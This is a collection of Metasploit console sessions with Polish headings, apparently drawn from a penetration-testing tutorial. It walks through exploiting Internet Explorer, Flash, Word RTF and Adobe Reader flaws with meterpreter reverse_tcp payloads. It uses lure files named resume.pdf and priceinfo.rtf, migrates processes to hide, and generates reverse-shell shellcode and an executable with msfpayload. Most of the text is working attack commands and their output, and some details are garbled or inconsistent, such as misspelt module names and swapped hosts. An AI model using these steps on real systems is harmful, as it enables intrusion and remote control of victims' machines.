Luka execCommand Use-After-Free w zabezpeczeniach przegldarki Inte  rnet Explorer

msf >  use exploit/windows/browser/ie_execcommand_uaf
msf exploit (ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf) > show options

Module options (exploit/windows/browser/ie_exexccommand_uaf) :

    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    SRVHOST    0.0.0.0          yes       The local host to listen on.
    SRVPORT                     yes       The local port to listen on.
    SSL        false            no        Negotiate SSL for incoming connection.
    SSLCert                     no        Path to custom SSL Certificate.
    SSLVersion SSL3             no        Specify the version of SSL.
    URIPATH                     no        The URI to use for this exploit.

Payload options (exploit/windows/browser/ie_exexccommand_uaf) :
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique : seh, thread, process, none
LHOST                      yes       The listen address. 
LPORT     4444             yes       The listen port.

Exploit Target:
Id  Name
--  ----
0   Automatic

msf exploit (ie_execcommand_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit (ie_execcommand_uaf) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf exploit (ie_execcommand_uaf) >set URIPATH /
URIPATH => /
msf exploit (ie_execcommand_uaf) > exploit
[*] exploit running as background job
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL : http://192.168.1.101:80/
[*] Server started
msf exploit (ie_execcommand_uaf) >[*] ie_execcommand_uaf) Mozilla/5.0 
[compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 
; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf  loading page.html
[*] 192.168.1.101 ie_execcommand_ uaf  using JRE ADP
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 
; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 
; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf - Loading page.html
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 
; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf - Redirecting to page.html
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 => 
192.168.1.100:63670) at 2012-05-09 18:24:44 
[*] Session ID 1 (192.168.1.101:4444 => 192.168.1.100:63670) processing 
InitialAutoRun Script 'migrate -1
[*] Current server process : ieexplorer.exe (5476)
[*] Spawning notepad.exe process to migrate to 
[*] Migrating to 4768
[*] Successfully migrated to process
msf exploit (ie_execcommand_uaf) > sessions l
msf exploit (ie_execcommand_uaf) > sessions i 1
[*] Starting interaction with 1
meterpreter > sysinfo
Computer : TRACEWIN
OS : Windows XP (Build 6000, Service Pack 3)
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

=========================================================================

Luka Adobe Flash Player new function zwizana z wyjtkiem niewaciwego uycia wskanika

msf  > use exploit/windows/fileformat/adobe_flashplayer_newfunction
msf  exploit (adobe_flashplayer_newfunction) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf  exploit (adobe_flashplayer_newfunction) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > exploit
[*] Exploit running as background job.

[*] Started revere handler on 192.168.1.101:4444
[*] Using URL: http://192.168.1.101:8080/filename
[*] Server started.
msf  exploit (adobe_flashplayer_newfunction) >
[*] Sending crafted PDF */SWF to 192.168.1.100:1039
[*] Sending stage (748032 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1040)
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.101:1040) processing InitialAutoRunScript migrate f
[*] Current server process : firefox.exe (3644)
[*] Spawning a notepad.exe host process
[*] Migrating into process ID 3900
[*] New server process: notepad.exe (3900)

msf  exploit (adobe_flashplayer_newfunction) > sessions  -l
Active sessions
Id		Type			Information		Connection
1		meterpreter		ERIC-FD2123B3C	192.168.1.100:1040
msf  exploit (adobe_flashplayer_newfunction) > sessions  -i 1
meterpreter>
============================================================================

Przepenienie stosu bufora formatu RTF aplikacji Microsoft Word

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 

msf  exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required   Description
   ----      ---------------  --------   -----------
   FILENAME   msf.rtf          yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh..
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME priceinfo.rtf
FILENAME => priceinfo.rtf

msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.56.101

[*] Creating 'priceinfo.rtf' file ...

[+] priceinfo.rtf stored at /root/.msf4/local/priceinfo.rtf
Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:57031) at 2011-11-13 23:16:20 +0530

[*] Session ID 2 (192.168.56.101:4444 -> 192.168.56.1:57031) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: WINWORD.EXE (5820)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 5556
[+] Successfully migrated to process
==============================================================

Uszkodzenie pamici przy obsudze formatu U3D w aplikacji Adobe Reader

Msf  > use exploit/windows/adobe_reader_u3d
Msf exploit (adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (adobe_reader_u3d) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
Msf exploit (adobe_reader_u3d) > set filename resume.pdf
Filename => resume.pdf
Msf exploit (adobe_reader_u3d) > exploit
[*] Creating resume.pdf file
[+] resume.pdf stored at /root/.msf4/local/resume.pdf

Now we need to create a listener to handle reverse connection when the malicious file is executed on victims vicinity.  Let see how it is done in next few steps.
Msf exploit (adobe_reader_u3d) > use exploit/multi/handler
Msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
Msf exploit (handler) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.101:1074)

Meterpreter > sysinfo
Computer 	: HP-PC
OS		: Windows XP (Build 2600, Service Pack 2).
Meterpreter > shell
Process 256 created.
Channel 1 created.
Microsoft Windows XP (Version 5.1.2600)
C:\Documents and Settings\John\Desktop>
====================================================================

Generowanie pliku binarnego oraz kodu powoki za pomoc narzdzia msfpayload

root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 o
So we have set up the LHOST and LPORT according to our need. The next step will be to generate a C code for our customized shell (the displayed output has been shortened to fit)
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 C

/*
 * windows/shell/reverse_tcp - 290 bytes (stage 1)
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.56.101, LPORT=4441, 
 * ReverseConnectRetries=5, EXITFUNC=process, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
Notice the capital C parameter in the command line. You will notice a complete shellcode in C language which we can use in our own exploit development code. Alternatively, we also have the option to generate codes in Ruby and Perl language. 
Let us proceed to the next step of generating a binary executable for the shellcode which can be used in our client-side attack.
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 X > .local/setup.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.56.101"}

Now that our executable is ready, we will have to set up a listener in our msfconsole to listen for a back connection when the target executes this exe file.
msf > use multi/handler

msf  exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

msf  exploit(handler) > set LHOST 192.168.46.101

msf  exploit(handler) > exploit

[-] Handler failed to bind to 192.168.46.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler


